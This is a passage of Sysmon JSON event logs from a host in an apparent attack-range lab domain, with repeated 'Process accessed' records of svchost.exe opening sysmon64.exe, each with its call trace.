C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:59.731","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:59","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2795,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:59.731\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:59.731","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:59","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2796,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:59.731\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:59.731","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:59","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2797,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:59.731\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:59.731","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:59","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2798,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:59.731\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:59.731","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:59","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2799,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:59.731\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:59.731","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:59","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2800,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:59.731\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:59.731","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:59","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2801,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:59.731\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:59.731","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:59","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2802,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:59.731\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 